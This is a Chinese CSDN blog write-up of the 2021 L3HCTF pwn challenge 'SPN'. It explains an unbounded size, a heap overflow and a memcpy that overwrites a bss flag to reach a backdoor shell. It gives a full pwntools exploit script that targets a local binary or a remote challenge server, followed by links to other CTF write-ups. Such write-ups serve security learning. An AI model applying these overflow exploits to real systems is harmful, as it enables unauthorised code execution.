2021 L3HCTF pwn SPN

最新推荐文章于 2024-02-07 01:03:16 发布
最新推荐文章于 2024-02-07 01:03:16 发布
阅读量366 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/121988352
版权

在这里插入图片描述
保护没开canary… 不知道啥意思

首先add这里就有问题
在这里插入图片描述size也没范围
index因为限制了v3,v5不能为负,也没范围。

如果能是负数直接数组越界这题也就解决了。

再然后出大问题的是edit
在这里插入图片描述
首先给了100字节的堆溢出
再然后看下面那个memcpy,因为我们前面没有限制size的大小,所以我们这里可以任意覆盖bss上TEMPBUF下面的变量

后门函数要求shell等于0.
shell这变量
在这里插入图片描述

在这里插入图片描述
显然就在TEMPBUF下面,我们直接盖过去就可以了。
在这里插入图片描述
重点要注意的是我们申请的chunk的序号要写大一点,不然会被复制过来的盖住,导致后面memcpy出错。

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

pc = "./SPN_ENC"

local = 1
if local:
    r = process(pc)
    elf = ELF(pc)
    libc = elf.libc
    
else:
    r = remote("81.69.230.99",9003)
    elf = ELF(pc)
    libc = ELF("./libc-2.27.so")

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))

def db():
    gdb.attach(r)
    pause()

def dbs(src):
    gdb.attach(r, src)

def add(size, index):
    sla("0.exit\n", "1")
    sla("Size:\n", str(size))
    sla("Index:\n", str(index))

def edit(size,index,content):
    sla("0.exit\n", "2")
    sla("Index:\n", str(index))
    sla("Size\n", str(size))
    sa('Content', content)

def backdoor():
    sla("0.exit\n", "5")

add(0x1100, 200)
#db()
edit(0x1100, 200, '\x00' * 0x1100)

backdoor()

ti()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1597
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2090
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
L3H CTF
热门推荐
qq_51584770的博客
11-15 1万+
Easy PHP 思路:当把这段代码复制到本地的时候,发现源码长得很奇怪 if ("admin" == $_GET[username] &‮⁦+!!⁩⁦& "‮⁦CTF⁩⁦l3hctf" == $_GET[‮⁦L3H⁩⁦password]) { //Welcome to include "flag.php"; echo $flag; } 想到用url编码的方式,将源码进行编码 得到: if(“admin”==$_GET[username]&%E2%80%
2024 L3HCTF---Crypto---babySPN revenge
2202_75787160的博客
02-05 452
它是一个简化版的AES加密算法(具体为AES的Round 1部分)。简单来说就是hash_value 找出并且看出flag为hash_value加L3HCTF
L3HCTF 2021 | 大吉大利,全民夺旗!
Cyberpeace的博客
10-22 604
​​赛题攻关 战术竞技 带你深度体验网络攻防 组队开黑 策略为王 等你上演一场绝地求生! 第七届XCTF国际网络攻防联赛分站赛 L3HCTF 2021 2021年11月13日09:00-15日09:00 火力全开,等你来战! 本届L3HCTF是由XCTF联赛的合作单位L3H_Sec战队组织,由赛宁网安提供技术支持。作为第七届XCTF国际联赛的分站赛,本次比赛将采用在线网络安全夺旗挑战赛的形式,面向全球开放。 L3H_Sec战队首次作为出题战队参与赛事,赛题风格备受期待。据队长透露,赛题将侧重考察选手的综合
2021L3HCTF luuuuua Writeup
qq_41866334的博客
11-15 5550
2021 L3HCTF luuuua Writeup AAA:immortal 这题做完以后感觉和ByteCTF2021的language binding很像,这是我之前写的Writeup 。 首先打开java层,发现asserts/res/test.lua里的逻辑是假的。然后通过LoginActivity里的afterTextChanged方法找到关键的b.c.a.b.a.d。 注意它 import org.keplerproject.luajava.LuaState; import org.ke
2021l3hctfwp_web
meteox的博客
11-15 3317
Image Service 1 给了源码但没完全给,服务是用gin写的,给的是编译后的文件,运行main后可知 运行app的main的时候由于没数据库报错了 以为下面的包名对应的链接给了源码,然而并不能访问到。。。 给了robot的源码 import requests import time import os os.chdir(os.path.dirname(os.path.abspath(__file__))) username = 'admin' password = os.e
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
[2021XCTF]L3HCTF-Writeup(Web)
Y4tacker的博客
11-16 2931
文章目录写在前面WebImage Service 1Image Service 2Easy PHPbypass绕过方法一绕过方法二绕过方法Ncover 写在前面 这周刚好比较空就抽了点时间打了下,质量挺高的还是 Web Image Service 1 注册个账号,发现密码不能是admin 进去可以上传图片 flag在admin账户上传的图片中 源码都被编译了 感觉在任何地方输入admin 都会被ban, 伪造header也都不行 f12我查看源码的时候发现居然是支持表单提交 不会逆向go,那无源码情况
pwn 入门基础
y0un9er
08-10 3920
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
2015第七届HCTF
liukenn的博客
12-07 1195
大三狗一只,第一次写blog,希望记录下自己从零开始的CTF之旅 两个彩笔第一次参见正式的CTF,写写只做出来的5道题#共三十几道题啊。。=。= 首先是全部题目的地址: https://www.zybuluo.com/lightless/note/183904
HCTF2017-Web-Writeup
dengzhasong7076的博客
11-14 2658
boring website 先通过扫描得到: http://106.15.53.124:38324/www.zip <?php echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br /...
XCTF-L3HCTF2021 DeepDarkFantasy write up
qq_42940521的博客
11-15 4688
XCTF-L3HCTF2021 DeepDarkFantasy write up DeepDarkFantasy 题目描述和hint如下 原始附件如下: 链接:https://pan.baidu.com/s/1Rs1A6viKUXuNvxExAvtvSQ 提取码:lqln 下载后得到一个pth文件,根据第一个提示,其被以简单异或的方式加密,遍历得到解密比特为0xde,此时可以发现PK头 解密后的文件如下: 链接:https://pan.baidu.com/s/1fTiS7DzQP_Rpv_fkB5Ct
L3HCTF2021几道简单的签到题
Hopeace的博客
11-25 1446
L3HCTF2021几道简单的签到题Misc WelcomeWeb Image1Web EasyPHP 作者:Hopeace Misc Welcome 第一次做misc的题目,迷迷糊糊的注册之后, 进去好像是个聊天室类似的东西 随便点点就找到了flag Web Image1 靶机地址:http://121.36.209.245:10001/ 附件下载地址:http://121.36.209.245:10001/static/deploy.zip 题目要求: Find flags in admin’s sha
L3HCTF bypass出题人视角
yzddMr6的博客
02-27 2849
@yzddmr6 自己在L3HCTF中出了一道java上传绕过题目bypass。其中题目中的一些trick不仅仅是用于CTF出题,对于实战渗透也是有一定的帮助。今天跟大家分享一下出题时的一些思考跟解题细节。 题目有三道过滤 1. 绕过后缀 public static String checkExt(String ext) { ext = ext.toLowerCase(); ...
l3hctf2024 pwn treasure_hunter
最新发布
qq_62172019的博客
02-07 516
可以看到上面的大块可以覆盖到0x20小块的数据区,正好这个小块存放着hashmap的pairs指针我们只需要覆盖其低地址并且在可控制的块伪造pairs和修改一些关键字符(dream操作)就可以完成伪造,伪造之后就可以实现将任意的key放在hashmap中从而实现任意读任意写。我刚才提到了" 修改关键字符 ",如上图在hashmap每插入一对pair的时候都会产生一个字符用于标识key,所以我们只需要搞明白字符是怎么来的和字符应该放在哪里。上图我也写了注释,v8就是我们要确定的字符。成功getshell。
hctf[pwn] the-end
九层台
11-12 2020
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf(&quot;here is a gift %p, good luck ;)\n&quot;, &amp;a...
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值